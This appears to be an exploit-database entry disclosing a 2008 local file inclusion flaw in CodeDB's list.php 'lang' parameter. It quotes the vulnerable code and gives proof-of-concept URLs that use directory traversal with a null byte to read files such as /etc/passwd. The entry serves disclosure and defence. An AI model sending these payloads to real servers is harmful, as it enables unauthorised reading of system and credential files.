CodeDB (list.php lang) Local File Inclusion Vulnerability

vendor:

CodeDB

by:

cOndemned

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: CodeDB

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CodeDB (list.php lang) Local File Inclusion Vulnerability

CodeDB is prone to a local file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files on the affected computer, potentially resulting in the disclosure of sensitive information. This issue affects the 'list.php' script, the 'lang' parameter is vulnerable to this attack.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php
    
    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
    
    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
    
    
Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00

    
EoF.   

# milw0rm.com [2008-07-14]